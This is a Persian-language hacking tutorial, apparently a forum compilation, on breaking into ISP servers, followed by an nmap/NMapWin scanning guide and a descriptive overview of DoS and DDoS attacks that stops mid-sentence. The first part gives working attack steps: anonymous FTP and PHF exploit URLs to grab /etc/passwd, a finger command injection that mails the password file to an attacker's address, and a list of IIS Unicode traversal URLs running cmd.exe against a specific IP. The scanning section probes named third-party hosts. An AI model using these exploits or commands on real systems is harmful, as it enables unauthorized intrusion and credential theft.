هک isp, هک isp


هک isp, هک isp

خوب این کار n راه داره اما اینو بدون که سایتها انقدا هم درپیت نیستن که بشه راحت ازشون اکانت پیچوند و عشق دنیا رو کرد !
من یه چندتا راه رو می گم که اگه سعی کنی و دنبالشو بگیری حتما یادمی گیری ! ببین برای بدست آوردن یوزرنیم و اکانت های یک آی اس پی باید به هاردسرور اون آی اس ژی متصل بشی !در این راه احتمالا با مشکلات زیادی برخورد خواهید کرد .من راه کامل و بی عیبی را در اختیار شما نمی گذارم برای هکر شدن باید تلاش بسیاری کرد و این اشاره ای است که شما را به طرف راه درست هدایت می کند .برای هک یونیکس از این طریق عمل می کنند که با روش هایی که ذکر خواهد شد فایل حاوی Passwordها و ID ها را که به نام Passwdمی باشد دریافت کنند .این فایل یک فایل متنی است که در آن اطلاعات بصورت رمز در آمده .وقتی شکا یک فایل Passwd را باز کنید چنین نوشته هایی را می بینید .که باید آن را از حالت رمز در آورد .
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
Ahmad hacker:3A62i9qr:1012:10:Mashhad
در اینجا مثلا ahmad hacker نام IDو 3a62... کلمه ی عبور اما به صورت رمز در آمده می باشد .
شاید فایل به شکل زیر هم باشد .اما این فایل کار را غیرممکنمی سازد.در صورتی که به شکل زیر باشد یعنی در آن علامت *به جای کلمه ی به رمز آمده به آن ها Shadowedگفته می شود .

root:*1:Operator:/:/bin/csh
admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
ahmad hacker:*:1012:10:mashhad BFH:/home/user/ahmad hacker:/usr/local/bin/tcsh

حالا از اول یکم راحت تر این روش رو که حمله از طریق dos هست رو میگم
بعد از اتصال کامل باید از آی اس پی تون یه whois بگیرید ! اگه سایت مورد نظرتون برای org , net , com است من www.samspade.org رو پیشنهاد می کنم ! و روششم اینطوری هست :

http://www.samspade.org/t/whois?a=ahmad hacker.com

که بجای ahmad hacker.com آدرس سایت مورد نظرتون رو بنویسید حالا یه صفحه باز میشه که کلی اطلاعات در مورد این سایت نوشته ما با اونا کارنداریم فقط باید دنبال کلمه Domain servers یا بعضی موقه ها اگه اون نبود دنبال DNS Servers می گردیم که یا بالای صفحه هست یا پایین !
حالا وارد قسمت Command Prompt بشید که همون داس خودمونه تایپ کنید !
FTP http://www.domain.com
که Domainآدرس سرور ISP هستش که اون بالا توضیح دادم بعد از شما خواسته می شه تا آیدی خودتونو وارد کنید کلمه Anonymousرا بزنید وقتی درخواست کلمه عبور شد کلید Enterرا بزن .اگر وارد سیستم شدی موفق شده ای در غیر این صورت جمله ی login failedدریافت می شه . خوب پس این دفعه Password رو آدرس یهEmail را وارد کن .اگر این بار هم جواب نداد این دفعه روش های زیر رو امتحان کن :

FTP ftp.domain.com

خلاصه تمام تلاش خودتو برای فهمیدن روش دستیابی به سیستم بکن اگر توانستید وارد سیستم بشی به راحتی می توانی وارد شاخه ی مشخصی رفته و فایل Passwdها را بگیری ولی احتمال دارد که آن شاخه برای شما قفل شده باشد .برای کار با FTPباید دستورات FTPرا بلد باشی برای اینکه دستورات رو ببینید ? رو تایپ کنید . حالا به شاخه ی ETCبرو می توانی فایل passwd را در آنجا پیدا کنی .این فایل را بگیر .اگر تو اونجا نبود شاخه های دیگه رو امتحان کن . ولی به احتمال زیاد همونجاست .حال اگر اصلا نتوانستید وارد FTPشوید می توانید این فایل را با استفاده از قایلبیت PHFبگیرید .به این صورت که در Internet Browserخود آدرس زیر را وارد کن .

http://www.domain.com/cgi-bin/phf?Q...t%20/etc/passwd

اگر به این صورت هم نتوانستید آن را بگیرید می توانید از طریق Fingerاین کار را انجام بده .این روش به شرطی جواب می دهد که Serverمورد نظر قابلیت Fingerرا داشته باشد .به آدرس زیر مراجعه کن .

www.domain.com/cgi-bin/finger

اگر این آدرس کار کنه کادری جلوت ظاهر می شه که ازت می خواد نام مورد نظر خود را وارد کنی آدرس زیر را وارد کنید .

ID@domain.com ; /bin/mail you@somewhere.com < etc/passwd

که در این آدرس IDشناسه کاربری یک شخص است که مثلا می توانید از آیدی دوستتان استفاده کنید domain.comآدرس نام حوزه ی ISPاست و آدرس you@somewhere.comآدرس Emailشماست مثلا این یک نمونه است .

bfh@internet.com ; /bin/mail amir6_6_6i@yahoo.com < etc/passwd

با وارد کردن این دستور فایل Passwdبرای من به آدرس ahmadx4u@yahoo.com
پست می شi !

خوب حالا تا الان اگر توانسته اید فایل را گرفته باشید که بهتر در غیر اینصورت باید بی خیال این روش بشی .
حالا اگر یه فایل مثل نمونه ی اولی که در بالا بود گیر آوردی می توانی کار خود را ادامه بدی حالا شما نیاز به یک برنامه ی Unix Password Crackerدارید معروف ترین این نوع برنامه ها John Ripperو Cracker Jack هستش .اما John Ripper سریعترین نوع این برنامه می باشد .این دو برنامه را می توانید از همان آدرس قبلی یعنی www.hackersclub.com/km/frontpageبه دست بیاوری ! این روشهای بالایی ماله سیستم های یونیکس هست که الان تقریبا هفتاد درصد از یونیکس استفاده می کنند !

روش بعدی استفاده از اسکریپت ها هست که صد در صد عملی هست اما یکم مشکل هست !
تو این روش شما باید روش exploit و نوشتن اسکریبتها رو بلد باشیو بدون هیچ تروجان بک دوری می تونی وارد هارد سرور بشی !
این روش اینطوری هست که بعد از بدست آوردن سرور باید آی پی سرور رو هم بدست بیاری برای بدست آوردن آی پی سرور از فرمان nslookup تو داس استفاده می کنیم !
C:>nslookup
که بعد از تایژ این فرمان یه چیزایی میاد و آخرین سطر یه علامت < هست که شما باید جلوی اون آدرس سرور رو بنویسید مثلا :
server s1.ahmad hacker.com<
که جواب میشنویم
Default Server: s1.ahmad hacker.com
Address: 194.165.8.60
حالا باید بانوشتن اسکریبت ها وارد هارد سرور بشیم !
من در مورد نوشتن اسکریپت ها چیزی نمی گم چون که با یه کی دو خط نمی شه چیزی فهمید !
شما بعد از نوشتن اسکریپت می تونید به شکل زیر ازش استفاده کنی !
http://serverip/script
که به جای serverip آی پی سرور بدست اومده رو می نویسیم و به جای script هم اون اسکریژتی که نوشتیم حالا خیلی راحت وارد هارد سرور می شی ! من نا امیدت نمی کنم امتحان کن یه نرم افزار برات معرفی می کنم که این اسکریپت هارو سرچ می کنه ! اما کامل نیست و زیاد نمیشه بهش تکیه کرد از این http://www.astalavistalab.com/files/cgis4.zip آدرس دانلود کنید اسمشم CGI Scanner هست !
روش کارشم اینه که آدرس آی پی سرور رو تو قسمت و Url مینویسی و از منوی rule set گزینه scan all رو تایپ می کنی ! البنه می تونی مستقیما آدرس سایت رو تو قسمت Url بنویسی اما درصد خطا خیلی زیاد می شه ! من یه چند تا اسکرپت رایج رو برات می گم ! البته برای هر سرور یه اسکریپت جواب میده :


HTTP://194.165.8.60/scripts/..%25%35%63../.../cmd.exe?/c+dir
HTTP://194.165.8.60/scripts/..%25%35%63../.../cmd.exe?/c+dir
HTTP://194.165.8.60/scripts/..%%35c../winn.../cmd.exe?/c+dir
HTTP://194.165.8.60/scripts/..%%35c../..%%.../cmd.exe?/c+dir
HTTP://194.165.8.60/scripts/..%%35c../winn.../cmd.exe?/c+dir
HTTP://194.165.8.60/scripts/..%%35c../..%%.../cmd.exe?/c+dir
HTTP://194.165.8.60/scripts/..%%35%63../wi.../cmd.exe?/c+dir
HTTP://194.165.8.60/scripts/..%%35%63../...../cmd.exe?/c+dir
HTTP://194.165.8.60/scripts/..%%35%63../...../cmd.exe?/c+dir
HTTP://194.165.8.60/scripts/..%%35%63../...../cmd.exe?/c+dir
HTTP://194.165.8.60/scripts/..%%35%63../wi.../cmd.exe?/c+dir
TTP://194.165.8.60/scripts/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c%20dir%20C:
HTTP://194.165.8.60/scripts/..%u00255c../..../cmd.exe?/c+dir

راه های دیگه ای هم هستن مثل تروجانهای بک دور و ... اما هم مشکل ترن هم اینکه به خاطر فایروال ها و ... دیر و خیلی سخت به نتیجه می شه رسید !

معرفی NMap و NMapWin


معرفی nmap و NMapWin

اگر بخواهید مهم‌ترین ابزاری را که یک هکر برای footprinting استفاده می‌کند بدانید، آن نرم‌افزار nmap خواهد بود که برای سیستم‌های لینوکس و یونیکس طراحی شده است. برای هکرهای تازه‌کار که سیستم‌عامل ویندوز را به کار می‌برند، نسخه گرافیکی و تحت ویندوزی طراحی شده است که NMapWin نام دارد و همان امکانات را فراهم می‌آورد. بحث این‌ جلسه درباره این نرم‌افزار است. برای داون‌لود این نرم‌افزار اینجا را کلیک کنید! اندازه برنامه 6.18 مگابایت است و اگر اتصالتان dial-up است، کمی طول خواهد کشید. ضمنا توجه کنید که این برنامه مخصوص ویندوز ۲۰۰۰ و xp است.

این نرم‌افزار مجموعه ابزارهای footprinting مثل پورت اسکن، آی‌پی اسکن، تشخیص سیستم‌عامل کامپیوتر مورد نظر (OS detection) و … را گرد هم آورده است. شکل ظاهری برنامه را در زیر می‌بینید:

- بررسی ظاهر برنامه

شکل ظاهری برنامه چهار قسمت دارد:

۱- Network Section :
بالاترین قسمت پنجره برنامه است که محلی برای ورود ip یا ip‌ ها دارد به نام Host. بعد از وارد کردن ip و تنظیم کردن پارامترها، دکمه Scan را کلیک می‌کنیم تا کار اسکن شروع شود.
اگر قرار باشد بیش از یک ip وارد شود، این کار را می‌توان به صورت‌های مختلف انجام داد. مثلا: *.*.192.130 یعنی تمام ip هایی که با 192.130 شروع می‌شوند ولی دو عدد بعدی هرچیزی می‌تواند باشد. و نوشتن به صورت 15-192.130.120.12 یعنی عدد آخری می‌تواند از ۱۲ تا ۱۵ باشد.

۲- Option Folder :
این قسمت در واقع محل تنظیمات است و به کمک آن مشخص می‌کنیم که از برنامه می‌خواهیم که چه‌کاری انجام دهد که مفصلا در موردش صحبت خواهم کرد. در این قسمت، برگه‌هایی با نام‌های Option , Discover , Scan , ... وجود دارد.

۳- Log Output :
محل ظاهر شدن نتایج است. در حالتی که اسکن شروع نشده باشد، خالی است.

۴- Status bar :
پایین‌ترین بخش پنجره برنامه است و دو بخش مهم دارد:
قسمت سمت چپ نشان می‌دهد که اگر بخواهیم در nmap همین کار رو انجام بدیم، چه سویچ‌هایی را باید بکار بریم ( دقت کنید که nmap برخلاف NMapWin گرافیکی نیست ). هر تغییری که در قسمت Option Folder اعمال کنیم، در این قسمت تغییری را مشاهده می‌کنیم و توصیه می‌کنم که حتما به این قسمت توجه ویژه‌ای داشته باشید.
اما در سمت راست آن، یک مربع کوچک مشاهده می‌شود که می‌تواند به رنگ‌های سبز یا قرمز باشد. سبز یعنی اینکه برنامه آماده برای اجرای دستورات شماست و قرمز یعنی در حال انجام دستورات وارد شده است و فعلا دستور جدید نمی‌پذیرد.


- شروع کار با NMapWin

فرض کنید که می‌خواهم سایت far30.com رو می‌خواهم مورد بررسی قرار دهم. برای اینکار ابتدا ip رو بدست‌ آورده (63.148.227.65) و در قسمت Host تایپ می‌کنیم. حالا فعلا بدون اعمال تغییری در قسمت Option Folder ، دکمه Scan رو کلیک می‌کنیم. اسکن شروع می‌شود و بعد از چند دقیقه، نتایج زیر در قسمت Log Output ظاهر می‌شود:
Starting nmap V. 3.00 ( www.insecure.org/nmap )Interesting ports on (63.148.227.65):(The 1583 ports scanned but not shown below are in state: closed)Port State Service21/tcp open ftp 25/tcp open smtp 31/tcp open msg-auth 53/tcp open domain 80/tcp open http 110/tcp open pop-3 135/tcp open loc-srv 143/tcp open imap2 443/tcp open https 445/tcp open microsoft-ds 1025/tcp open NFS-or-IIS 1026/tcp open LSA-or-nterm 1050/tcp open java-or-OTGfileshare 1433/tcp open ms-sql-s 3372/tcp open msdtc 3389/tcp open ms-term-serv 6666/tcp open irc-serv 7007/tcp open afs3-bos Remote operating system guess: Windows 2000/XP/MENmap .... -- 1 IP address (1 host up) scanned in 156 seconds
در همین‌جا سه نوع اطلاعات قابل دسترسی است:
۱- لیست پورت‌های باز روی کامپیوتر سرور و کاربرد آن پورت‌ها
۲- تشخیص سیستم عامل که Windows 2000/XP/ME حدس زده شده است (سطر ماقبل آخر)
۳- و سطر آخر می‌گوید که این ip روشن (up) است.


- بررسی برگه Scan از قسمت Option Folder

این برگه خود ۲ بخش دارد:

+> بخش Mode :
در درس‌های قبلی گفتم که اسکنینگ انواع مختلفی داره، و اینجا جایی است که نوع اسکنینگ رو مشخص می‌کنیم:
- Connect : اسکن از نوع TCP connect scan است که قبلا در درس هفتم درباره‌اش بحث کرده‌ام.
- SYN Stealth : در درس هفتم درباره این هم گفته‌ام. - پیش‌فرض هم همین است
- Null Scan , Xmas tree , FIN Stealth : برای سرورهای غیر از ویندوز کار می‌کنند.
- UDP Scan : برای اسکن کردن پورت‌های udp است.
- Ping Sweep : برای عمل ip scanning است که بدانیم که از بین یک سری ip کدام‌ها فعال هستند.
- List Scan : همان Ping Sweep است ولی به طوری که ip مان لو نرود.
- ACK Scan : معمولا برای تشخیص فایروال‌ها کاربرد دارد.
- Window Scan : همان ACK Scan است ولی کامل‌تر
- RCP Scan : جزو کامل‌ترین حالت‌های اسکنینگ است با اطلاعات فراوان.

+> بخش Scan Options :
این قسمت شش گزینه دارد که فقط یکی‌شان به درد می‌خوره:
- Port Range : مشخص می‌کند که چه پورت‌هایی باید اسکن شود: اگر خالی بماند، یعنی همه پورت‌ها ، اگر یک عدد نوشته شود یعنی فقط آن پورت و اگر به‌صورت n-m نوشته شود (که n و m عدد هستند) یعنی از پورت n تا پورت m اسکن شود.


- بررسی برگه Discover از قسمت Option Folder

این برگه دارای چهار گزینه است:

- TCP Ping : برای بررسی فعال بودن کامپیوتر مورد نظر می‌تواند به‌کار رود.
- ICMP Ping : پینگ فقط از نوع ICMP باشد.
- TCP+ICMP : برای بررسی فایروال‌ها مناسب است (پیش‌فرض)
- Don"t Ping : پینگ نکند.


- بررسی برگه Options از قسمت Option Folder

این برگه خود ۲ بخش دارد:

+> بخش Options :

- Fragmentation : اگر بخواهیم در اسکنینگ‌هایی از نوع Null, Xmas, FIN, SYN تا حدودی تغییرات اعمال کنیم تا حداقل خطر را برای ما داشته باشند، می‌توان این گزینه را انتخاب کرد. ولی باید توجه داشت که گاهی با انتخاب این گزینه اسکنینگ موفقیت آمیز نخواهد بود.
- Get Idented Info : اگر بخواهیم اسکنینگ از نوع connect صورت دهیم، با انتخاب این گزینه گاه اطلاعات ذی‌قیمتی برای ما به ارمغان می‌آورد.
- Resolve All : در حالت پیش‌فرض، این نرم‌افزار روی ip هایی که up هستند، عمل Reverse Whois را انجام می‌دهد (یعنی از روی ip، به دنبال اسم DNS مربوطه می‌گردد). اگر Resolve All را انتخاب کرده باشیم، روی همه ip ها، چه up و چه down عمل Reverse Whois انجام خواهد شد.
- Don"t Resolve : هرگز Reverse Whois نخواهد کرد.
- OS Detection : از جمله مهم‌ترین گزینه‌های این نرم‌افزار است که اگر انتخاب‌شده باشد، برنامه سعی می‌کند که سیستم‌عامل کامپیوتر مقابل را حدس بزند.
- Random Host : به صورت تصادفی ip هایی را تست می‌کند، و هرگز هم به پایان نمی‌رسد.

+> بخش Debug :

- Debug : اگر مارک شده باشد، نتایج دیباگ مرحله به مرحله در خروجی نشان داده می‌شود.
- Verbose : اگر انتخاب‌شده باشد، پیشرفت کار را نشان می‌دهد.
- Very Verbose : پیشرفت کار را با نهایت جزئیات نشان می‌دهد.


- بررسی برگه Timing از قسمت Option Folder

این برگه خود ۲ بخش دارد:

+> بخش Throttle :

در این بخش هرچه گزینه‌های بالاتر را انتخاب کنید، کار کندتر و دقیق‌تر است و احتمال detection (لو رفتن) شما کمتر است و هرچه پایین تر برعکس. به نظر می‌رسد، Normal بهترین انتخاب باشد.

+> بخش Timeouts :

- Host Timeout : حداکثر زمانی را مشخص می‌کند که برای یک ip می‌تواند صرف شود.
- Max RTT : حداکثر زمانی را مشخص می‌کند که برای یک probe می‌تواند صرف شود. پیش‌فرض، 9000 است (یعنی ۹ ثانیه)
- Min RTT : برای هر probe حداقل به این اندازه صبر می‌کند.
- Initial RTT : این گزینه خصوصا در ip هایی که فایروال دارند، مفید است.
- Parallelism : اگر در مورد acw_spscan دقت کرده‌ باشید، این برنامه هر بار فقط یک پورت را پروب می‌کند و نه بیشتر ( به همین خاطر است که اول اسم آن simple دارد ). ولی محصولات واقعی باید همزمان تعدادی پورت را تست کنند. در این قسمت می‌توان حداکثر تعداد پورت‌هایی که می‌تواند همزمان پروب شوند را مشخص می‌کنیم.
- Scan Delay : بین هر اسکن، حداقل به این میزان صبر می‌کند.


- بررسی برگه Files از قسمت Option Folder

این برگه خود ۲ بخش دارد:

+> بخش Input :

برای اینکه روند کارها را سریع‌تر کنیم، می‌توان از این بخش استفاده کرد. در این حالت ورودی از یک فایل خوانده می‌شود.

+> بخش Output :

این قسمت برای آن است که نتایج را در یک فایل ذخیره کنیم. این فایل می‌تواند به‌صورت Normal (متنی معمولی)، Grep (که الان دیگه به‌کار نمیره)، XML و یا All (هر سه مورد) باشد.


- بررسی برگه Service از قسمت Option Folder

فرض کنید می‌خواهید اول هر هفته فلان ip رو تست کنید و کارهایی از این‌دست... این برگه برای همین‌جور کارهاست (میشه گفت یک نوع اتوماسیون)


- بررسی برگه Win32 از قسمت Option Folder

این برگه دو بخش دارد به نام‌های Options , Commands که فقط Options رو بررسی می‌کنم:

- No Pcap : وقتی که NMapWin را نصب می‌کنیم، Pcap هم نصب می‌شود ( که فقط روی سیستم‌های ویندوز ۲۰۰۰ و xp می‌تواند نصب شود) و کارها را برعهده می‌گیرد. اگر بخواهیم که از آن استفاده نشود و به‌جای آن از Raw Socket استفاده شود، این گزینه را مارک می‌کنیم.
- No IP HLP Api : مثل بالایی فقط اینکه بین ارسال هر پکت، ۱۵ ثانیه منتظر می‌ماند.
- No Raw Sockets : با انتخاب آن Raw Socket به‌کار نمی‌رود.
- Force Raw Socket : باعث می‌شود که فقط Raw Socket به‌کار رود.
- Win Trace : برای سیستم‌های Win32 کمی اطلاعات بیشتری به‌دست می‌دهد.


- استفاده از NMapWin برای تعیین نوع سیستم عامل

اگر مهم‌ترین کاربرد‌های nmap را بخواهیم بدانیم، یکی port scanning و دیگری OS detection (تشخیص سیستم‌عامل مقابل) است که ویژگی دوم به قدری مهم است که گاه nmap را با همین ویژگی می‌شناسند. برای اینکه نوع سیستم‌عامل را تعیین کنیم، باید در برگه Options از NMapWin، گزینه OS detection انتخاب شده باشد.
حالا چند مثال را بررسی می‌کنیم (شما خودتان این‌ ip ها و ip های دیگر را تست و تمرین کنید) :

194.225.184.15
Remote operating system guess: Windows 2000 server SP2

195.219.176.5
Remote operating system guess: Linux Kernel 2.4.0 - 2.5.20

206.104.238.208
Remote operating system guess: Linux 2.1.19 - 2.2.20

217.66.199.6
(Remote operating system guess: Cisco router running IOS 12.1.5-12.2(6a

63.148.227.65
Remote operating system guess: Windows 2000/XP/ME

194.225.184.2
No exact OS matches for host (If you know what OS is running on it, see http://www.insecure.org/cgi-bin/nmap-submit.cgi).
در این مورد می‌بینید که nmap موفق به تعیین نوع سیستم‌عامل نشده است. ممکن است دلیلش این باشد که ip در آن لحظه up نبوده‌ است.

نکته‌ای که باید در نظر داشت این است که گاه باید از یک سری اطلاعات فنی هم استفاده کرد تا به جواب قطعی رسید :
- مثلا ip ماقبل آخر که نتیجه آن به صورت Windows 2000/XP/ME ظاهر شده است، متعلق به sazin.com است که چون یک سایت است و باید در یک سرور باشد و هیچ سروری نمی‌تواند ME یا XP باشد، پس سیستم‌عامل آن Win 2000 خواهد بود.
- یا یک حالت دیگر موردی است که ببینید صفحات یک وب سایت با asp یا asp.net درست شده است (مثلا اسم صفحه به صورت zzzzzz.asp یا zzzzzz.aspx باشد، که نمونه آن سایت far30.com است که اسم همین صفحه default.asp است). در این حالت سرور آن حتما سروری از محصولات مایکروسافت است مثل Win NT و یا Win 2000 و نمی‌تواند Linux یا Unix یا Sun Solaris و... باشد.


- چگونه از nmap استفاده کنیم؟

قبلا با نرم‌افزار NMapWin آشنا شدید که نسخه گرافیکی nmap برای ویندوز بود. nmap در واقع نرم‌افزار اصلی است که هم برای یونیکس (لینوکس) و هم برای ویندوز نسخه‌هایی را دارد. nmap برخلاف NMapWin، حالت خط فرمانی (command prompt) دارد. در این قسمت می‌خواهیم با nmap مخصوص ویندوز آشنا شویم. برای داون‌لود این نرم‌افزار اینجا را کلیک کنید. (اگر قبلا NMapWin را نصب نکرده‌اید، باید از یک نسخه دیگر از nmap که اصطلاحا nmap installer نام دارد، استفاده کنید. این نسخه nmap را می‌توانید از اینجا داون‌لود کنید. )
همان‌‌طور که می‌دانید، در نرم‌افزارهای خط فرمانی، باید از پارامترها استفاده کنیم. با توجه به اینکه پارامترهای nmap بسیار زیاد و یادگیری آنها مشکل است، ما برای پیدا کردن پارامترهای درست برای یک عمل خاص ( که معمولا ip scanning یا port scanning است) از NMapWin استفاده می‌کنیم. به این ترتیب که در NMapWin تنظیمات را انجام می‌دهیم و بعد در پایین پنجره آن مشاهده می‌کنید که در قسمت :CMD لیست پارامترها را به دست می‌آوریم. این مراحل را با دو مثال شرح می‌دم:

۱- می‌خواهیم برای پورت‌های ۱ تا ۲۰۰ در کامپیوتری که ip آن 63.148.227.65 است، یک پورت اسکننیگ انجام دهیم. برای این‌کار در NMapWin، برگه Scan را درحالت SYN Stealth تنظیم می‌کنیم و Port Range را می‌نویسیم: 200-1 و بعد برگه Discover باید در حالت TCP+ICMP باشد و اگر بخواهیم نوع سیستم‌عامل را هم مشخص کنیم، در برگه Options، گزینه OS detection را در حالت انتخاب شده قرار می‌دهیم. ip را هم در بالای پنجره، 63.148.227.65 می‌نویسیم. حالا آماده اسکن هستیم ولی ما می‌خواهیم این کار را با nmap انجام دهیم، پس فقط باید قسمت CMD را از پایین پنجره ببینید، ملاحظه می‌کنید که نوشته شده:

CMD: -sS -PT -PI -p 1-200 -O -T 3 63.148.227.65
با حذف کلمه :CMD به عبارت زیر می‌رسیم:

-sS -PT -PI -p 1-200 -O -T 3 63.148.227.65
اینها پارامتر‌هایی است که باید در nmap استفاده کنید. به این صورت که می‌نویسید:

nmap -sS -PT -PI -p 1-200 -O -T 3 63.148.227.65
و بعد از اجرای دستور و صبر کردن برای چند دقیقه، نتایج را می‌بینیم.
بعد از مدتی که با nmap کار کنید، این پارامترها را می‌آموزید و دیگه نیازی به NMapWin نخواهید داشت. مثلا همین O- یعنی OS detection، و 200-p 1 یعنی پورت‌های ۱ تا ۲۰۰ می‌باشد. بعدها خودتان می‌بینید که کار کردن با nmap بسیار دلچسب‌تر از NMapWin است.

۲- می‌خواهیم یک ip scanning انجام دهیم برای 195.219.176.0 تا 195.219.176.10 . برای اینکار در NMapWin، در برگه Mode، گزینه Ping Sweep را انتخاب می‌کنیم. در برگه Discovery، گزینه ICMP Ping را انتخاب کرده و در برگه Options، گزینه OS detection را در حالت انتخاب نشده قرار می‌دهیم. برای نوشتن ip ملاحظه می‌فرمایید که 195.219.176 در هر دو مشترک است، پس می‌نویسیم: 10-195.219.176.0 .حالا می‌بینیم که پارامترها به صورت زیر است:

-sP -PI -T 3 195.219.176.0-10
پس ما می‌نویسیم:

nmap -sP -PI -T 3 195.219.176.0-10

آشنایی با حملات تحت داس قسمت دوم


آشنایی با حملات تحت داس قسمت دوم

از آنجا که حملات طغیان بسته های دیتا معمولاً تلاش می کنند منابع پهنای باند و پردازش را خلع سلاح کنند، میزان بسته ها و حجم دیتای متناظر با رشته بسته ها عوامل مهمی در تعیین درجه موفقیت حمله هستند. بعضی از ابزارهای حمله خواص بسته ها را در رشته بسته ها بدلایلی تغییر می دهند: · آدرس IP منبع – در بعضی موارد، یک آدرس IP منبع ناصحیح، (روشی که جعل IP نامیده می شود) برای پنهان کردن منبع واقعی یک رشته بسته استفاده می شود. در موارد دیگر، جعل IP هنگامی استفاده می شود که رشته های بسته به یک یا تعداد بیشتری از سایت های واسطه فرستاده می شوند تا باعث شود که پاسخ ها به سمت قربانی ارسال شود. مثال بعدی در مورد حملات افزایش بسته است (مانند smurf و fraggle) · پورتهای منبعمقصد- ابزار حمله طغیان بسته بر اساس TCP و UDP ، گاهی اوقات پورت منبع و یا مقصد را تغییر می دهند تا واکنش توسط فیلتر کردن بسته را مشکل تر کنند. · مقادیر IP Header دیگر - در نهایت در ابزار حمله DoS مشاهده کرده ایم که برای مقداردهی تصادفی، مقادیر Header هر بسته در رشته بسته ها طراحی شده اند که تنها آدرس IP مقصد است که بین بسته ها ثابت می ماند. بسته ها با خواص ساختگی بسادگی در طول شبکه تولید و ارسال می شوند. پروتکل TCP/IP به آسانی مکانیزم هایی برای تضمین پیوستگی خواص بسته ها در هنگام تولید و یا ارسال نقطه به نقطه بسته ها ارائه نمی کند. معمولاً، یک نفوذگر فقط به داشتن اختیار کافی روی یک سیستم برای بکارگیری ابزار و حملاتی که قادر به تولید و ارسال بسته های با خواص تغییریافته باشند، نیاز دارد. ژوئن ۱۹۹۹، آغاز بکارگیری ابزار DoS با چندین منبع یا DDos (Distributed DoS) بود. روش های حمله DoS در این قسمت به یک تقسیم بندی کلی درباره انواع حملات DoS می پردازیم: Smurf یا Fraggle حملات smurf یک از مخرب ترین حملات DoS هستند. در حمله Smurf (حمله براساس ازدیاد بسته های ICMP)، نفوذگر یک تقاضای اکوی ICMP (ping) به یک آدرس ناحیه می فرستد. آدرس منبع تقاضای اکو، آدرس IP قربانی است. (از آدرس IP قربانی بعنوان آدرس برگشت استفاده می شود). بعد از دریافت تقاضای اکو، تمام ماشین های ناحیه پاسخ های اکو را به آدرس IP قربانی می فرستند. در این حالت قربانی هنگام دریافت طغیان بسته های با اندازه بزرگ از تعداد زیادی ماشین، از کار خواهد افتاد. حمله Smurf برای ازکار انداختن منابع شبکه سیستم قربانی از روش مصرف پهنای باند استفاده می کند. این حمله این عمل را با استفاده از تقویت پهنای باند نفوذگران انجام می دهد. اگر شبکه تقویت کننده ۱۰۰ ماشین دارد، سیگنال می تواند ۱۰۰ برابر شود، و بنابراین حمله کننده با پهنای باند پایین (مانند مودم ۵۶ کیلوبیتی) می تواند سیستم قربانی را با پهنای باند بیشتری (مانند اتصال T1) از کار بیندازد. حمله Fraggle (تقویت بسته UDP) در حقیقت شباهت هایی به حمله Smurf دارد. حمله Fraggle از بسته های اکوی UDP بر طبق همان روش بسته های اکوی ICMP در حمله Smurf استفاده می کند. Fraggle معمولاً به ضریب تقویت کمتری نسبت به Smurf می رسد، و در بیشتر شبکه ها اکوی UDP سرویسی با اهمیت کمتر نسبت به اکوی ICMP است، بنابراین Fraggle عمومیت Smurf را ندارد. SYN Flood حمله طغیان SYN قبل از کشف حمله Smurf بعنوان مخرب ترین شیوه حمله DoS بشمار می رفت. این روش برای ایجاد حمله DoS بر اساس قحطی منابع عمل می کند. در طول برقراری یک ارتباط معمولی TCP، سرویس گیرنده یک تقاضای SYN به سرویس دهنده می فرستد، سپس سرور با یک ACK/SYN به کلاینت پاسخ می دهد، در نهایت کلاینت یک ACK نهایی را به سرور ارسال می کند و به این ترتیب ارتباط برقرار می شود. اما در حمله طغیان SYN، حمله کننده چند تقاضای SYN به سرور قربانی با آدرس های منبع جعلی بعنوان آدرس برگشت، می فرستد. آدرس های جعلی روی شبکه وجود ندارند. سرور قربانی سپس با ACK/SYN به آدرس های ناموجود پاسخ می دهد. از آنجا که هیچ آدرسی این ACK/SYN را دریافت نمی کند، سرور قربانی منتظر ACK از طرف کلاینت می ماند. ACK هرگز نمی رسد، و زمان انتظار سرور قربانی پس از مدتی به پایان می رسد. اگر حمله کننده به اندازه کافی و مرتب تقاضاهای SYN بفرستد، منابع موجود سرور قربانی برای برقراری یک اتصال و انتظار برای این ACKهای در حقیقت تقلبی مصرف خواهد شد. این منابع معمولاً از نظر تعداد زیاد نیستند، بنابراین تقاضاهای SYN جعلی حتی با تعداد نسبتاً کم می توانند باعث وقوع یک حمله DoS شوند. حملات DNS در نسخه های اولیه BIND (Berkely Internet Name Domain)، حمله کنندگان می توانستند بطور مؤثری حافظه نهان یک سرور DNS را که در حال استفاده از عملیات بازگشت برای جستجوی یک ناحیه بود که توسط این سرور سرویس داده نمی شد، مسموم کنند. زمانی که حافظه نهان مسموم می شد، یک کاربر قانونی به سمت شبکه مورد نظر حمله کننده یا یک شبکه ناموجود هدایت می شد. این مشکل با نسخه های جدیدتر BIND برطرف شده است. در این روش حمله کننده اطلاعات DNS غلط که می تواند باعث تغییر مسیر درخواست ها شود، ارسال می کند. حملات DDoS حملات DDoS (Distributed Denial of Service) حمله گسترده ای از DoS است. در اصل DDos حمله هماهنگ شده ای برعلیه سرویس های موجود در اینترنت است. در این روش حملات DoS بطور غیرمستقیم از طریق تعداد زیادی از کامپیوترهای هک شده بر روی کامپیوتر قربانی انجام می گیرد. سرویس ها و منابع مورد حمله ، «قربانی های اولیه» و کامپیوترهای مورد استفاده در این حمله «قربانی های ثانویه» نامیده می شوند. حملات DDoS عموماً در از کار انداختن سایت های کمپانی های عظیم از حملات DoS مؤثرتر هستند. انواع حملات DDoS عموماً حملات DDoS به سه گروه Trinoo، TFN/TFN2K و Stecheldraht تقسیم می شوند. Trinoo Trinoo در اصل از برنامه های Master/Slave است که با یکدیگر برای یک حمله طغیان UDP بر علیه کامپیوتر قربانی هماهنگ می شوند. در یک روند عادی، مراحل زیر برای برقراری یک شبکه Trinoo DDoS واقع می شوند: مرحله۱: حمله کننده، با استفاده از یک میزبان هک شده، لیستی از سیستم هایی را که می توانند هک شوند، گردآوری می کند. بیشتر این پروسه بصورت خودکار از طریق میزبان هک شده انجام می گیرد. این میزبان اطلاعاتی شامل نحوه یافتن سایر میزبان ها برای هک در خود نگهداری می کند. مرحله۲: به محض اینکه این لیست آماده شد، اسکریپت ها برای هک کردن و تبدیل آنها به اربابان(Masters) یا شیاطین (Daemons) اجراء می 